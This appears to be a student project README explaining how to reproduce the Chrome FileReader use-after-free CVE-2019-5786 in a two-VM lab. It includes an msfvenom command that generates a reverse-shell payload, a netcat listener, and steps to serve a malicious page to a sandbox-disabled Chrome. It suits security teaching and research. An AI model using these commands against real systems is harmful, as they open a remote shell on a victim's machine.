
Members: Yogesh Chaudhary, Haolin Ye, Madhvik Patel

Topic: Reproducing CVE-2019-5786 chrome Filereader Use-After-Free vulnerability


  • VM for Windows7 (32-bit) with the vulnerable chrome version installed: Link
  • A Linux VM (such as Ubuntu 16.04)

If you want to have a fresh build, here are the resources you need:

  • VM file for Windows 7 (32-bit) from Microsoft: Link
  • Google_Chrome (v72.0.3626.119): Link

You should put these two VMs in the same LAN for convenience and make sure they can find each other. If you are using Virtualbox, select "NAT Network"; If you are using VMWare, select "NAT".


How to run the exploit

Setups on the attacker side (Linux VM)

You need to host the malicious website on the Linux VM so make sure you have apache2 installed. You can verify if the service is running by following command on Linux VM:

systemctl status apache2

Firstly, generate a new shellcode because you need to include attacker VM's ip address in the shellcode. You can check the ip address of Linux VM by ifconfig. Then, use a very popular tool called MsfVenom to generate the shellcode and encode it with percent-encoding. Execute the following command by replacing YOUR_IP with your Linux VM's ip address.

msfvenom -p windows/powershell_reverse_ tcp LHOST=YOUR_IP LPORT=4449 PayloadBindPort=4449 -a x86 --platform windows -f js_le -e generic/none

Then, open index.html and search for shellcode variable. Replace it with the shellcode you just generated.

Secondly, move the malicious website (index.html) to the web root folder of apache2

sudo mv index.html /var/www/html

Thirdly, start a local listener using netcat and cross your finger

nc -lvnp 4449

On Windows7 VM

You need to open cmd and run chrome.exe out of sandbox environment with the flag --no-sandbox. Here are the commands:

cd "C:\Program Files\Google\Chrome\Application"

chrome.exe --no-sandbox

Finally, visit the malicious website hosted on Linux VM. For example, if the ip address of your Linux MV is, you should visit the url

If the exploitation is successful, you can see a reverse shell established on Linux VM. If the malicious page is crashed, simply refresh the page and try again since we might not get multiple references all the time and also due to some heap randomisation.

Video Demo

You can also check our demo here on YouTube.
